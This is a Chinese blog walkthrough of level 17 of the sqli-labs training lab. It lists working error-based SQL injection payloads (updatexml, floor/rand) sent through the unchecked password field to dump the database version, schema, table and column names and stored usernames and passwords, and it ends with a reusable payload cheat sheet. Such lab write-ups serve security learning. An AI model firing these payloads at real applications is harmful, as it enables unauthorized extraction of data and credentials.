sqli-labs第十七关

最新推荐文章于 2024-05-16 22:14:02 发布
最新推荐文章于 2024-05-16 22:14:02 发布
阅读量286 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuqnqi/article/details/130587118
版权

查看源码单引号闭合

 

查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试

爆版本
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e, version(),0x7e),1)) --+&submit=Submit

 爆库

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) -- -&submit=Submit

 爆表名

uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) -- -&submit=Submit

 

爆列名

uname=admin&passwd=1' and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="users")),0x7e)) -- -&submit=Submit

 爆数据

uname=admin&passwd=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#&submit=Submit

 

END!!!

爆版本
admin' and (updatexml(1,concat(0x7e, version(),0x7e),1)) -- -
爆库
admin' and updatexml(1,concat(0x7e,database(),0x7e),1) -- -
爆表名
admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) -- -
爆列名
1' and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))--+
爆列名
1' and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))--+
爆值
1'  and  updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') sqllab ),0x7e),1) --+
1'  and  updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+
1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#

宇语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilabs第17
wh1sper、的博客
04-29 1145
sqlilabs第17一、分析二、手注 一、分析 这题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs 17
m0_69548793的博客
08-27 1315
sqli-labs 17
SQLI-labs-第十七
最新发布
weixin_54055099的博客
05-16 928
Sqli-labs第十七,二次注入、报错注入
sqli-labs-----第17
wyzhxhn的博客
11-10 803
基于报错的更新查新。
sqli-labs第十七详解
金 帛的博客
04-26 4104
sqlilabs第十七详解
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL-labs的第17——报错注入(updatexml)
qq_73393033的博客
07-20 467
这一的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs第十七(post-报错注入)
qq_42266432的博客
08-29 881
进入到十七后发现这有点不同,上面多了一行提示:密码重新设置,咱也不懂啥意思,在试了写常规注入的方法后,没有发现什么可以利用的点,于是决定去看看代码,虽然我不会php 先看这一部分有sql语句的: 从users表中搜索出uname和psw,条件和psw无,只看uname mysql_fetch_array()好像能返回键值对,而且除了将数据以数字索引方式储存在数组中之外,还可以将数据作为联索引储存,用字段名作为键名。 uname正确的话,再将users表中psw更新,条件等于刚刚输入的unam.
sqli-labs靶场第十七
gou1791241251的博客
12-27 889
十七有点特别,让我重置密码,但是注入的原理还是一样的。 在输入用户名的地方,我尝试了单引号,双引号,不输入,等测试去判断闭合方式,最终没有得到想要的结果 后来在输入密码的地方尝试了同样的操作,最终结果都是一样。。 实在没有了头绪我选择了代码审计! 在代码中可以看到,先是处理账号,如果账号存在,则才能重置密码,也就是说,如果账号不存在,输入密码也是没用的 在这里我们可以看到,后台接收到uname参数时,调用了一个函数进行过滤了用户输入的内容。但是没有对密码进行过滤,所以密码框才是真正的注入点 如果输入内容
SQLi Labs Lesson17
1ame的博客
08-15 1147
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
Sqlilabs-17
KAKA的博客
07-07 854
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sqli-labs(17)
jimggg的博客
03-20 194
Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)
sqli2 第17
m0_69349614的博客
07-09 356
我们先按照这个网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码。 切换到 Less 11 验证一下,可以看到此时 admin 用户的密码已经被我们所修改。 接下来判断注入类型,使用单引号闭合构造恒真条件,网页回显密码修改失败。 Copy Highlighter-hljs 测试一下所有的注入,发现这些注入网页都回显改密失败。 Copy Highlighter-hljs 抓包得知网页需要利用 POST 方法提交的参数格式如下: Copy Highlighter-hljs
sqli-labs闯
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值